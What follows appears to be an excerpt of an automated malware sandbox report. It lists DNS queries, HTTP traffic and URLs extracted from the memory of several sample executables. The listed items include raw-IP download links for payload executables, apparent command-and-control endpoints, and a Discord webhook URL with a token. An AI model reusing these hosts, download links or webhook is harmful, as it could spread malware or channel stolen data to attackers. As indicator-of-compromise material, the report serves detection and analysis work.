Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: discord.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 10:12:03 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733825524x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNg1o74%2BkqUOB84B4h8XfgTKohFJD0AlxIXUlaQlk%2F%2FruYdOWZhMIoHY12D6ZqKUVEZyPKJmyRv%2F2JG%2FzoUC5tIppKzwzM%2FWbbBxxZ40c%2BmGMTtbzQXjZSOMYie8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=59f527526709dc59fe053bcdcdee0892135d5087-1733825523; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=aFwCpN3tiXI0c43fGnPVz7baTzHcO1r8iGZIdQldmQw-1733825523255-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8efc744e5f495e78-EWR{"message": "Unknown Webhook", "code": 10015}

Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe~
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe_
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/W
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%q%
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0001
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpU
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpta
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3317744980.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/1521297942/H3tyh96.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/1521297942/H3tyh96.exeJ
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/1521297942/H3tyh96.exeXYZ0123456789
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/1521297942/H3tyh96.exeq
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6j
Source: H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000026.00000002.3192853264.0000000007B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microO
Source: powershell.exe, 00000026.00000002.3121758184.00000000033DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microZ
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: H3tyh96.exe, 00000007.00000002.3314067263.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3126814710.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3114672517.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: H3tyh96.exe, 00000007.00000002.3699643239.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: H3tyh96.exe, 00000007.00000002.3359474514.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: H3tyh96.exe, 00000007.00000002.3359474514.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000011.00000002.3089463536.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3084016917.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3173110956.0000000006207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3074244910.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3071186867.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3125496690.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3174623487.00000000044B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000028.00000002.3174623487.0000000004605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: H3tyh96.exe, 00000007.00000002.3695352181.00000000060A5000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000013.00000002.3091300131.0000000006EA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000011.00000002.3074244910.0000000004D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3071186867.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3125496690.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3174623487.00000000044B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bs
Source: H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: 75f24a4b40.exe, 00000008.00000003.3240100682.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3284706233.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2956826525.0000000001490000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2954139426.000000000148E000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3240829939.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3281595071.0000000001413000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3239056800.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3144279007.0000000005C46000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: 75f24a4b40.exe, 00000008.00000003.3240829939.0000000001409000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3281595071.0000000001405000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3240100682.0000000001408000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/&=
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/J
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/Jx%z
Source: 75f24a4b40.exe, 00000030.00000003.3140153337.000000000074C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/P0
Source: 75f24a4b40.exe, 00000008.00000003.3239359046.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3083855419.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3284823099.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3144279007.0000000005C46000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3245713550.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3250888626.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3249076983.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3140240867.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: 75f24a4b40.exe, 00000008.00000003.3239262560.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api#z
Source: 75f24a4b40.exe, 00000008.00000002.3284823099.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api1z
Source: 75f24a4b40.exe, 00000030.00000003.3245713550.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3250888626.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3249076983.000000000547B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api2gJ
Source: 75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api5J
Source: 75f24a4b40.exe, 00000008.00000002.3295583956.0000000005C47000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3238794806.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3239359046.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3144279007.0000000005C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api?
Source: 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiXv
Source: 75f24a4b40.exe, 00000008.00000003.3078427746.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3083855419.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apid:
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apii
Source: 75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apin
Source: 75f24a4b40.exe, 00000008.00000003.3142558119.00000000014AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiyzf
Source: 75f24a4b40.exe, 00000008.00000002.3281595071.0000000001422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3282121599.000000000547D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005033000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
